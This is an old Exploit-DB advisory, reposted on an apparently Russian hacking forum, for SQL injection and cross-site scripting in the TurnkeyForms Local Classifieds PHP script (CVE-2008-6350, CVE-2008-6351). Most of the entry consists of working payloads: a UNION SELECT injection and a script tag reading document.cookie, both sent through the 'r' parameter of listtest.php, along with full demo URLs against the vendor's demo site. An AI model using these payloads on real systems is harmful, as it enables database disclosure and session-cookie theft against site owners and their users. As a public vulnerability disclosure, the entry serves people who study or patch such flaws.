Exploit TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7035
Проверка EDB
  1. Пройдено
Автор
TR-SHARK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6351 cve-2008-6350
Дата публикации
2008-11-07
Код:
##################################################################
#
#   Author: TR-ShaRk
#
######################
#
#   Web   : StarHack.Us OldKral.Com
#
######################
#
#   Emai   : [email protected]
#
######################
#
#   Script : Local Classifieds Turnkeyforms
#
######################
#
#   SQL Injection Vuln. :
#
#   listtest.php?r=-39+union+select+1,@@version--
#
#   Xss:
#
#   listtest.php?r="><script>alert(document.cookie)</script>
#
######################
#
#   Demo:
#
#
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="><script>alert(document.cookie)</script>
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
#
######################

# milw0rm.com [2008-11-07]
 
Источник
www.exploit-db.com

Похожие темы